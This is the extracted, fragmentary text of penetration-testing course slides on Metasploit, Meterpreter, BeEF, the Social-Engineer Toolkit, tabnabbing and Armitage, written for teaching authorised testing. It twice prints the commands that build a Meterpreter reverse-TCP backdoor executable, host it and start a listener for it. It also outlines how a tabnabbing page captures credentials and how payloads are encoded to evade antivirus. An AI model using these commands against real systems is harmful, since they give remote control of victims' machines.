METASPLOIT
with
Course Introduction
Course Outline
Introduction to Penetration Testing
Armitage
Metasploit 101
PowerSploit
Meterpreter
Writing custom meterpreter scripts
Client side attacks
Exploiting client side vulnerabilities
Exploiting Browser based vulnerabilities
Post exploitation
Introduction to
PENETRATION
TESTING
Importance
Penetration tests are valuable for several reasons
Determining the feasibility of a particular set of attack vectors
Identifying higher-risk vulnerabilities which could lead to security breach
Identifying vulnerabilities
Testing the ability of network defenders
Providing evidence to support increased investments in security personal and technology
Pre-Engagement Interactions
Intelligence Gathering
Main attribute is reconnaissance( Information Gathering ) in Penetration Test
Reflects other stages of Penetration Testing
Different tools and scripts will be used for different platforms for Information Gathering
Threat Modeling
Depends on Intelligence gathered information and the pre-engagement information
Methodology
Business Asset Analysis
Business Process Analysis
Threat Agents/Community Analysis
Threat Capability Analysis
Motivation Modeling
Finding relevant news of comparable Organizations being compromised
Vulnerability Analysis
Involves in discovering flaws in target system
Different tools and scripts will be used for performing vulnerability analysis on different platforms
Threat level classification need to be created for exploitation phase
Priority should be given for threat level, need to analyze and exploit threats
Directly reflects in exploitation phase
Exploitation
Completely depends on vulnerability analysis phase & mainly focus on target exploitation.
Exploits target with appropriate exploit & with compatibility check
Pentester need to evade security systems, need to bypass and trigger the exploit for successful exploitation
Post Exploitation
Involves extending attack
Pen-tester can analyze further information during post exploitation
Might include juicy information
Using post exploitation phase attacker can enhance his persistency over the compromised system
Reporting
Consists of Penetration testing executive summary and technical report.
Executive summary mainly focuses on threat level severity, general findings, recommendation summary and road map
Technical report carries out how vulnerability analysis, exploitation and post exploitation has done
Based on reporting technical team can further move towards patch management.
Setting up
PENETRATION
TESTING
Lab
Virtualization
Virtualization, in computing, refers to the act of creating a virtual (rather than actual) version of something, including but
not limited to a virtual computer hardware platform, operating system (OS), storage device, or computer network
resources. --Wikipedia
Requirements for creating virtualization environment
Buzz Words
Host Operating system
Snapshot
Clone
METASPLOIT 101
Metasploit 101
Introduces Metasploit Framework
Buzzwords, Architecture, Framework Architecture, Interfaces and Modules
Scope for exploiting target vulnerability using in built exploits and payloads
Buzz Words
Vulnerability
Exploit
Payload
Metasploit Architecture
Libraries
TOOLS
Interfaces
REX
Console
CLI
MSFCORE
PLUGINS
WEB
GUI
MSF BASE
Armitage
Modules
PAYLOADS
EXPLOITS
ENCODERS
POST-Mods
Auxiliary
Exploits
Actual code which works on the target vulnerability system.
MSF has modular organization of exploits based on OS and service classification
Exploit Ranking Values
1. ManualRanking
2. LowRanking
3. AverageRanking
4. NormalRanking
5. GoodRanking
6. GreatRanking
7. ExcellentRanking
Source : https://dev.metasploit.com/redmine/projects/framework/wiki/Exploit_Ranking
Exploits Ranking
1. ManualRanking : Exploit is so unstable or difficult to exploit and is basically a DoS
2. LowRanking
: Exploit is nearly impossible to exploit (or under 50%) for common platforms
3. AverageRanking : Exploit is generally unreliable or difficult to exploit, then AverageRanking should be used
4. NormalRanking : Exploit is otherwise reliable, but depends on a specific version and can't reliably
auto-detect
5. GoodRanking
: Exploit has a default target and it is the "common case" for this type of software
6. GreatRanking
: Exploit has a default target AND either auto-detects the appropriate target or uses an
application-specific return address AFTER a version check
Source : https://dev.metasploit.com/redmine/projects/framework/wiki/Exploit_Ranking
Payloads
Payloads
Singles
Self contained ones does specific task
Stagers
Bridges connection Establishment
Stages
payload components that are downloaded
by Stagers modules
Post Exploitation
Critical component of penetration test.
Assist pen tester to gather information about exploited system.
Enhance attack in the targeted environment
Auxiliary Modules
MSF Auxiliary contains wide variety modules related to different services used for doing specific tasks
Auxiliary Modules
admin
crawlers
scanners
fuzzers
sniffers ....
MSF Tools
MSF Plugins
MSF Interfaces
Console
Armitage
WEB
CLI
GUI
Present Scenario
Meterpreter
Meterpreter
Meterpreter
Meterpreter >
Its a default Goto Payload for Windows
Provides Enhanced Command Shell for the attacker
Consists of default set of core commands
Can be extended at runtime by shipping DLLs on the Victim machine
Provides basic post-exploitation API
Working of Meterpreter
Getting a Meterpreter shell undergoes 3 different stages
Meterpreter basics
Core Commands
File System Commands
Networking Commands
System Commands
User Interface Commands
Launching Attack
Stage : 1 Creating Executable Backdoor
msfpayload windows/meterpreter/reverse_tcpLHOST=192.168.206.159 LPORT=44444 X >/var/www/evil.exe
root@kali:# apachectl start
Stage : 2 Enabling listener to connect back to attackers machine
root@kali:# msfconsole
msf > use exploit/multi/handler
msf > set payload windows/meterpreter/reverse_tcp
msf > set LHOST 192.168.206.159
msf > set LPORT 44444
msf > exploit
Present Scenario
Core Commands
Networking Commands
System Commands
Email
Java
Office suite
3rd party applications
Browsers
Whole agenda focus on client side exploitation :Client side software's
Exploiting Vulnerable services
Exposed to Hostile Servers
Lab Environment
Different stages
Security levels
Goal is to Pwn
Agenda
Exploiting :
Software based vulnerabilities
Web based vulnerabilities
Browser based vulnerabilities
PATCHED
ANTIVIRUS
FIREWALL
STAGE 1
NO
NO
NO
STAGE 2
NO
NO
YES
STAGE 3
NO
YES
YES
STAGE 4
YES
YES
YES
Stage -1
Level
PATCHED
ANTIVIRUS
FIREWALL
STAGE 1
NO
NO
NO
Stage -1
Level
PATCHED
ANTIVIRUS
FIREWALL
STAGE 1
NO
NO
NO
: Absent
Stage -1
Level
PATCHED
ANTIVIRUS
FIREWALL
STAGE 1
NO
NO
NO
Victim
Attacker
Msfencode
Shellcode generated by msfpayload contains null characters, shellcode which is deployed or else passing in a
network Might lead to AV / IDS & IPS detection. Msfencode module helps in avoid of bad characters.
Msfvenom
Msfpayload
Msfencode
Msfvenom
Binary Payload
Developed by using msfpayload
Requires bit of social engineering
DEMO
Stage : 1 Creating Executable Backdoor
msfpayload windows/meterpreter/reverse_tcpLHOST=192.168.206.159 LPORT=44444 X >/var/www/evil.exe
root@kali:# apachectl start
Stage : 2 Enabling listener to connect back to attackers machine
root@kali:# msfconsole
msf > use exploit/multi/handler
msf > set payload windows/meterpreter/reverse_tcp
msf > set LHOST 192.168.206.159
msf > set LPORT 44444
msf > exploit
Email
Java
Office suite
3rd party applications
Browsers
Exploiting
Software Based
Vulnerabilities
P A T C H ED
A N T I VI R U S
FI R E W A L L
STAGE 1
NO
NO
NO
STAGE 2
NO
NO
YES
STAGE 3
NO
YES
YES
STAGE 4
YES
YES
YES
Lets check for any vulnerable service running on the victims machine
We will exploit core software based vulnerabilities
Victim Environment
Exploiting
Browser Based
Vulnerabilities
-- Wikipedia
Features
BeEF's modular framework allows addition of custom browser exploitation commands.
The extension API allows users to change BeEF's core behavior.
Keystroke logging
Browser proxying
Integration with Metasploit
Plugin detection
Intranet service exploitation
Phonegap modules
Hooking through QR codes
Social Engineering modules spur user response such as entering sensitive data and responding to reminders to update
software
Restful API allows control of BeEF through http requests (JSON format).
Source: http://en.wikipedia.org/wiki/BeEF
BeEF Project
Configuring
Launching
root@kali: cd /usr/share/beef-xss/
root@kali: /usr/share/Metasploit-framework/./beef
beef
beef
Social Engineering
Toolkit
S.E.T.
Social Engineering
Kevin Mitnick
Motivation
Self Interest
Mr.X, want to access and/or modify information that is associated with a family member, colleague or even a neighbor.
Revenge
Mr.X, target a friend, colleague, organization or even a total stranger to satisfy the emotional desire for vengeance
Curiosity
Mr.X, receiving pressure from friends, family or organized crime syndicates for reasons such as financial gain,
self-interest and/or revenge
Introduction to SET
Social-Engineer Toolkit (SET) created and written by the founder of TrustedSec, Dave Kennedy
Interfaces :
Command line
Web
Introduction to Tabnabbing
"It can detect that you're logged into Citibank right now and Citibank has been training
you to log into your account every 15 minutes because it logs you out for better security.
It's like being hit by the wrong end of the sword.
Aza Raskin
http://www.azarask.in/blog/post/a-new-type-of-phishing-attack/
Behind Curtains
Attacker user customized scripts and hosting service to pretend it as a original page.
How to do it
Index1.html
Index2.html
Tabnab.js
Log.txt
script.php
Script.php
Log.txt
Hosting site
Script.js
Index-2.html
Index-1.html
Captured Credentials
Armitage
Armitage
Agenda
Introduction to Armitage
Installing and configuring Armitage
Host Management
Dynamic Workspaces
Importing Hosts
Scanning and exploiting targets
Exploit Automation
Introduction to Armitage
GUI front-end for the Metasploit Framework developed by Raphael Mudge
Kali Linux ships with inbuilt armitage and all the dependencies.
root@kali: service postgresql start
root@kali: service metasploit start
root@kali: armitage
Launching Armitage
Launching Armitage
Launching Armitage
Armitage UI
Adding Host
Adding Host
Scanning Host
Finding Attacks
Finding Attacks
Finding Attacks
Launching Attack
Launching Attack
Compromised System
Thank You